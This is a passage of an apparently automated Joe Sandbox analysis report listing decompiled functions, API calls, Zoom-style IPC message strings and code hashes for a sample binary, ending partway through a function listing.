                  • Part of subcall function 00C90AF2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID), ref: 00C90C35
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.ps.query.component.exist.result$componentType$exist
                • API String ID: 3124793654-1839886085
                • Opcode ID: dbc46beb963961b48709c39a27572350728a170ad94cd7918b2c4853e05c8b43
                • Instruction ID: 14ffc6744be588b77e807e12297381b7b8fe2ee3545bfa65f4ff6cea9f4b0fe2
                • Opcode Fuzzy Hash: dbc46beb963961b48709c39a27572350728a170ad94cd7918b2c4853e05c8b43
                • Instruction Fuzzy Hash: 2DE022F0B807906BD7206B488C8AB2A22A4AB40B1AF640138B1009A381CFF00D40D379
                Function 00C70C60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70C67
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.audio.facility.status,00002754,FromApp,AudioDevType,00000004), ref: 00C70C87
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: AudioDevType$FromApp$com.Zoom.app.conf.audio.facility.status
                • API String ID: 3124793654-2372748486
                • Opcode ID: 311f22b516c3140d6edfe23d05a4b7044a2b4c8fe9c5b005f0e35b5c66c8f33c
                • Instruction ID: 12061b3c768fe9244c7ae5c1f186bd2e6e80eca855d400af8cdd6b8b6ad738bc
                • Opcode Fuzzy Hash: 311f22b516c3140d6edfe23d05a4b7044a2b4c8fe9c5b005f0e35b5c66c8f33c
                • Instruction Fuzzy Hash: F5E09BB0A10394FBF711AB44DC86B2E7164AB90B5DF508539F1106A3D2C6F44C84D775
                Function 00C74C70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74C77
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mesh.notification,000027B9,etype,value,00000004), ref: 00C74C97
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.mesh.notification$etype$value
                • API String ID: 2715420528-4260425333
                • Opcode ID: e2812ff2f218568f650b841768a466829bc76a3165e52a3b450f98fc48383d56
                • Instruction ID: 5593ac366743be07b82c6fb7e802f66a3c171fd15320fe19ec4e1304791121df
                • Opcode Fuzzy Hash: e2812ff2f218568f650b841768a466829bc76a3165e52a3b450f98fc48383d56
                • Instruction Fuzzy Hash: 45E092B0B44798ABE7256B456C4AB2E71B4EB50B19F504439B6145A3C1CBF00D44D7B5
                Function 00C6CD40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CD47
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.suspend_to_resume,00009CC9,State,IpAddr,00000004), ref: 00C6CD67
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: IpAddr$State$com.zoom.app.assistant.sip.suspend_to_resume
                • API String ID: 2715420528-2108130886
                • Opcode ID: f285cb708f7e3b4f2eaf9942085a8244d4e336f9e328583d560aeb6e80aec1fa
                • Instruction ID: f67cd2ec0214e0dbc74beedfee3198e7cd7db7ad52f031f2c494351aefd9b3ee
                • Opcode Fuzzy Hash: f285cb708f7e3b4f2eaf9942085a8244d4e336f9e328583d560aeb6e80aec1fa
                • Instruction Fuzzy Hash: DCE092B4A50745BFD7207B465855F2F69A4EF50B1AF444428F1045E3C2CAF00C04C7F5
                Function 00C6ED40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ED47
                • ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.indentify.device.request,00009DDA,deviceID,deviceType,00000004), ref: 00C6ED67
                  • Part of subcall function 00C84F00: __EH_prolog3.LIBCMT ref: 00C84F07
                  • Part of subcall function 00C84F00: ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6752C,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C84F1A
                  • Part of subcall function 00C84FAD: __EH_prolog3_GS.LIBCMT ref: 00C84FB4
                  • Part of subcall function 00C84FAD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C84FDA
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85008
                  • Part of subcall function 00C84FAD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85045
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85075
                  • Part of subcall function 00C84FAD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request), ref: 00C850D3
                  • Part of subcall function 00C84FAD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction), ref: 00C850F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.indentify.device.request$deviceID$deviceType
                • API String ID: 2703795933-726637879
                • Opcode ID: 2567a83e2115180cc36e5f7abbf6ecd5b3ec904e5f9e411ecd2fab88208e2c0b
                • Instruction ID: 139ed43249ef0fe2aca582f30439b3cc93a8a586c7ac561a18a3cd017373b074
                • Opcode Fuzzy Hash: 2567a83e2115180cc36e5f7abbf6ecd5b3ec904e5f9e411ecd2fab88208e2c0b
                • Instruction Fuzzy Hash: ADE092B464069A7BE720BB885C46B2F2964EB91B5AF14442DB2005E3D2CBF00C40C779
                Function 00C76ED0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76ED7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.notify.component.download.progress,000027B4,componentType,percentage,00000004), ref: 00C76EF7
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.app.notify.component.download.progress$componentType$percentage
                • API String ID: 3124793654-3701629925
                • Opcode ID: 1b69390f5b9185992e9b39b4901fbcd75ba4a2e13660ea9c46c28d16d99c8ed0
                • Instruction ID: 54650d498d01d91fd46281ccafa7e3f4da7dd5fbfbdf367931e53ee54b6b2dc3
                • Opcode Fuzzy Hash: 1b69390f5b9185992e9b39b4901fbcd75ba4a2e13660ea9c46c28d16d99c8ed0
                • Instruction Fuzzy Hash: 3FE06DF0A447A8AADB25BB51DC5AB2E66749B50B59F404578B104AA392CBF00D00EBB4
                Function 00C5C830 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C837
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.on.get.default.profile.notify,00009E69,strDefaultProfile,count,00000004), ref: 00C5C855
                  • Part of subcall function 00C5D960: __EH_prolog3.LIBCMT ref: 00C5D967
                  • Part of subcall function 00C5D960: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C5C85A,com.zoom.app.mapi.outlook.on.get.default.profile.notify,00009E69,strDefaultProfile,count,00000004), ref: 00C5D97A
                  • Part of subcall function 00C5DA1D: __EH_prolog3_GS.LIBCMT ref: 00C5DA24
                  • Part of subcall function 00C5DA1D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C5C881), ref: 00C5DA38
                  • Part of subcall function 00C5DA1D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.mapi.outlook.on.get.default.profile.notify), ref: 00C5DA6A
                  • Part of subcall function 00C5DA1D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ ref: 00C5DAA7
                  • Part of subcall function 00C5DA1D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.mapi.outlook.on.get.default.profile.notify), ref: 00C5DAD9
                  • Part of subcall function 00C5DA1D: EnterCriticalSection.KERNEL32(?), ref: 00C5DB3B
                  • Part of subcall function 00C5DA1D: LeaveCriticalSection.KERNEL32(?,?), ref: 00C5DB58
                Strings
                • count, xrefs: 00C5C841
                • strDefaultProfile, xrefs: 00C5C846
                • com.zoom.app.mapi.outlook.on.get.default.profile.notify, xrefs: 00C5C850
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@Cmm@@_EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.mapi.outlook.on.get.default.profile.notify$count$strDefaultProfile
                • API String ID: 586599499-1231143739
                • Opcode ID: 221378d8d7fd2a88e06d005550d1d89db22098090b2b2715d2a80b1db3b9483c
                • Instruction ID: 4a0a6a9f2299829bbb881f62bb679ed56abf1d7ad4670b211215597f6ebfa662
                • Opcode Fuzzy Hash: 221378d8d7fd2a88e06d005550d1d89db22098090b2b2715d2a80b1db3b9483c
                • Instruction Fuzzy Hash: ECE020F0E403909BC7107B65AC06B2DB6A06B10B52F008618F5101A3C2CFF8458CDF7D
                Function 00CE84A1 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00D5F9F0,00000010,00CE8613,00000001,?,?,?,00D5FA10,00000008,00CE8697,00000001,?,?,00000000,?,?), ref: 00CE8500
                • ___AdjustPointer.LIBCMT ref: 00CE8568
                • ___AdjustPointer.LIBCMT ref: 00CE858B
